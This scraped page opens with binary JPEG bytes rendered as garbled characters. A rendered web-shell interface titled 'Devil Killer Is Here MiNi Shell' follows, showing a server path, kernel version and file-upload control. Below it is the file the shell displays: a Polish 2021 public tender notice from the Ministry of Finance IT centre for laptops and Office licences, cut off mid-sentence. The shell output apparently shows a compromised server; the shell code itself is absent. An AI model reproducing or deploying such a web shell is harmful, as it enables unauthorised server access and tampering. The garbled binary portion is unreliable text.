JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210823/0015753201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wysokowydajnych komputerów przenośnych ze stacją dokującą, komputerów przenośnych oraz oprogramowania biurowego w ramach projektu „Krajowy System e-Faktur”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM INFORMATYKI RESORTU FINANSÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 142636274</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Samorządowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-601</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 48 367 36 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+ 48 48 367 36 73</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.cirf@mf.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.cirf.gov.pl/start</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> usługi infrastruktury teleinformatycznej dla scentralizowanych systemów informatycznych Resortu Finansów </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wysokowydajnych komputerów przenośnych ze stacją dokującą, komputerów przenośnych oraz oprogramowania biurowego w ramach projektu „Krajowy System e-Faktur”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b967caa8-ede6-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00157532</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00016496/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.10 Dostawa laptopów dla wydziału DPA MF na potrzeby projektu 'Krajowy System e-Faktur'</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.cirf.gov.pl/ogloszenia/zamowienia-publiczne/powyzej-30000-eur <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">komunikował się z wykonawcami - adres strony internetowej:<br/>https://www.cirf.gov.pl/ogloszenia/zamowienia-publiczne/powyzej-30000-eur</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej.<br/>2.W postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>środków komunikacji elektronicznej zapewnionych przez system zapewniający obsługę procesu<br/>udzielania zamówień publicznych w CIRF za pośrednictwem środków komunikacji elektronicznej,<br/>zwany dalej Systemem.<br/>3. Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej jedynie wyjątkowo w sytuacji<br/>wskazanej w pkt. 14.15 TOM I SWZ.<br/>4.System jest dostępny pod adresem:<br/>https://www.cirf.gov.pl/ogloszenia/zamowienia-publiczne/powyzej-30000-eur.<br/>5. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania<br/>konta w Systemie ani logowania do Systemu.<br/>6. W sytuacji awarii Systemu lub przerwy technicznej działania Systemu Zamawiający dopuszcza<br/>komunikację za pomocą poczty elektronicznej na adres anna.wiatrek@mf.gov.pl (nie dotyczy składania<br/>ofert).<br/>7. Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu wynosi 100 MB.<br/>Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik skompresowany do<br/>archiwum (ZIP) zawierający wiele pojedynczych plików.<br/>8. Za przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>poświadczenia zgodności cyfrowego odwzorowania z dokumentem<br/>w postaci papierowej oraz innych informacji przyjmuje się datę ich przekazania do Systemu.<br/>9. Sposób sporządzenia podmiotowych środków dowodowych, przedmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń musi być zgody<br/>z wymaganiami określonymi w rozporządzeniu rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2021 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz w rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od Wykonawcy.<br/>10. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB<br/>w formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar,<br/>.7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1)administratorem Państwa danych osobowych jest Centrum Informatyki Resortu Finansów, 26-601<br/>Radom, ul. Samorządowa 1, adres poczty elektronicznej: sekretariat.CIRF@mf.gov.pl, tel.: 48 367 36<br/>00;<br/>2)inspektorem ochrony danych osobowych w Centrum Informatyki Resortu Finansów jest Pan –<br/>Krzysztof Piórkowski kontakt: IOD.CIRF@MF.GOV.PL;<br/>3)Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. Postępowanie o udzielenie zamówienia publicznego na dostawę wysokowydajnych komputerów przenośnych ze stacją dokującą, komputerów przenośnych oraz oprogramowania biurowego, znak sprawy PN/14/21/HSKU.<br/>4)odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1984 ze zm.), dalej „ustawa Pzp”;<br/>5)Państwa dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7)w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)posiadają Państwo:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych *;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo,<br/>że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO;<br/>9)nie przysługuje Państwu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania<br/>lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PN/14/21/HSKU</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest a. w ramach zamówienia podstawowego: dostawa 18 szt. wysokowydajnych komputerów przenośnych ze stacją dokującą, wraz z gwarancją na okres 36 miesięcy,<br/>b. w ramach prawa opcji: dostawa 6 szt. wysokowydajnych komputerów przenośnych ze stacją dokującą, wraz z gwarancją na okres 36 miesięcy.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w<br/>SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30211000-1 - Komputery wysokowydajne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Przedmiotem zamówienia w ramach prawa opcji jest dostawa 6 szt. wysokowydajnych komputerów przenośnych ze stacją dokującą, wraz z gwarancją na okres 36 miesięcy.<br/>2. Zamawiający uruchomi prawo opcji poprzez złożenie Wykonawcy pisemnego zawiadomienia wskazującego liczbę wysokowydajnych komputerów przenośnych oraz termin ich dostarczenia, nie krótszy niż 30 dni od daty zawiadomienia. Zamawiający jest uprawniony do uruchomienia prawa opcji dla liczby od 1 do 6 sztuk wysokowydajnych komputerów przenośnych, tj. Zamawiający może skorzystać z całości lub części świadczeń składających się na prawo opcji.<br/>3. Zamawiający nie jest zobowiązany do skorzystania z prawa opcji i w przypadku nieskorzystania nie ponosi względem Wykonawcy odpowiedzialności za jej niewykorzystanie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe wyposażenie - W tym: Wysokowydajny komputer przenośny typu „przenośna stacje robocza ” - Kamera internetowa 720p HD + IR z mikrofonem z wbudowaną fizycznie w obudowę komputera fabryczną przesłoną</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe wyposażenie - W tym: Wysokowydajny komputer przenośny typu „przenośna stacje robocza ” - Dodatkowy zintegrowany z komputerem trackpoint / point stick</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe wyposażenie - W tym: Wysokowydajny komputer przenośny typu „przenośna stacje robocza ” - Zaoferowanie komputera przenośnego wyposażonego w dodatkowy (ponad wymagane w Opisie Przedmiotu Zamówienia) port typu USB-C co najmniej 3.1 Gen 1z funkcją Power Delivery i przesyłania sygnału, wbudowany w komputer</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe wyposażenie - W tym: Stacja dokująca - Zaoferowanie stacji dokującej wyposażonej w dodatkowy (ponad wymagane w Opisie Przedmiotu Zamówienia) port HDMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest <br/>a. w ramach zamówienia podstawowego: dostawa 4 szt. komputerów przenośnych, wraz z gwarancją na okres 36 miesięcy,<br/>b. w ramach prawa opcji: dostawa 2 szt. komputerów przenośnych, wraz <br/>z gwarancją na okres 36 miesięcy.<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Przedmiotem zamówienia w ramach prawa opcji jest dostawa 2 szt. komputerów przenośnych, wraz <br/>z gwarancją na okres 36 miesięcy.<br/>2. Zamawiający uruchomi prawo opcji poprzez złożenie Wykonawcy pisemnego zawiadomienia wskazującego liczbę komputerów przenośnych oraz termin ich dostarczenia, nie krótszy niż 30 dni od daty zawiadomienia. Zamawiający jest uprawniony do uruchomienia prawa opcji dla liczby od 1 do 2 sztuk komputerów przenośnych, tj. Zamawiający może skorzystać z całości lub części świadczeń składających się na prawo opcji.<br/>3. Zamawiający nie jest zobowiązany do skorzystania z prawa opcji i w przypadku nieskorzystania nie ponosi względem Wykonawcy odpowiedzialności za jej niewykorzystanie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe wyposażenie - W tym: Komputer przenośny - Kamera internetowa 720p HD + IR z mikrofonem z wbudowaną fizycznie w obudowę komputera fabryczną przesłoną</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">14,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe wyposażenie - W tym: Komputer przenośny - Dodatkowy zintegrowany z komputerem trackpoint / point stick</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">13,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe wyposażenie - W tym: Komputer przenośny - Zaoferowanie komputera przenośnego wyposażonego w dodatkowy (ponad wymagane w Opisie Przedmiotu Zamówienia) port HDMI w wersji min. 2.0</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">13,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest <br/>a. w ramach zamówienia podstawowego: dostawa 18 szt. licencji oprogramowania Microsoft Office Standard 2019 lub równoważnych,<br/>b. w ramach prawa opcji: dostawa 6 szt. licencji oprogramowania Microsoft Office Standard 2019 lub równoważnych.<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48771000-3 - Pakiety oprogramowania użytkowego ogólnego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Przedmiotem zamówienia w ramach prawa opcji jest dostawa 6 szt. licencji oprogramowania Microsoft Office Standard 2019 lub równoważnych.<br/>2. Zamawiający uruchomi prawo opcji poprzez złożenie Wykonawcy pisemnego zawiadomienia wskazującego liczbę licencji oraz termin ich dostarczenia, nie krótszy niż 30 dni od daty zawiadomienia. Zamawiający jest uprawniony do uruchomienia prawa opcji dla liczby od 1 do 6 sztuk licencji, tj. Zamawiający może skorzystać z całości lub części świadczeń składających się na prawo opcji.<br/>3. Zamawiający nie jest zobowiązany do skorzystania z prawa opcji i w przypadku nieskorzystania nie ponosi względem Wykonawcy odpowiedzialności za jej niewykorzystanie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty 